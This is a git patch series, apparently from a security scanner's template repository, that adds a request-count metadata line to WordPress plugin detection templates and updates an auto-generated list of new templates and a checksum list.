b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 4888f7e781751cebbd34a464a7eadde990f9b71b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 06:59:37 +0000 Subject: [PATCH 559/609] Auto Generated New Template Addition List [Mon Jul 10 06:59:37 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..b7a57b901a 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +http/cves/2016/CVE-2016-10973.yaml From 6f75968393b617ca1a3da76d9d7d4e5a6f873c25 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 07:00:07 +0000 Subject: [PATCH 560/609] Auto Generated Templates Checksum [Mon Jul 10 07:00:07 UTC 2023] :robot: --- templates-checksum.txt | 403 +++++++++++++++++++++-------------------- 1 file changed, 202 insertions(+), 201 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4a97b19d2e..6e33b206ca 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -788,6 +788,7 @@ http/cves/2016/CVE-2016-10924.yaml:dce16b47d39b9f8cb61dfa2e4a0ee8e81b1b93fe http/cves/2016/CVE-2016-10940.yaml:dc778d0e3f008808558e3ed87fcb4b206fbcef3a http/cves/2016/CVE-2016-10956.yaml:72f67ac65902558893d17ab4bfce99850ca8bed3 http/cves/2016/CVE-2016-10960.yaml:e90cc536c6064e58b15b3daad819c925552e0f25 +http/cves/2016/CVE-2016-10973.yaml:a6bd3d3efaf79dcc271be21de9d1796f0c17d71c http/cves/2016/CVE-2016-10993.yaml:5ffdb9d642dcb491977119e2f72992499b28a191 http/cves/2016/CVE-2016-1555.yaml:0329f83a8bb07ae96f99d3981a10d47456fa9fcc http/cves/2016/CVE-2016-2389.yaml:8e5424f39f5c1bdf16abc05cef7e7d53eaedff1d @@ -5414,214 +5415,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3aa657b603a122999a7b7f29025758df12a0b6f6 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea 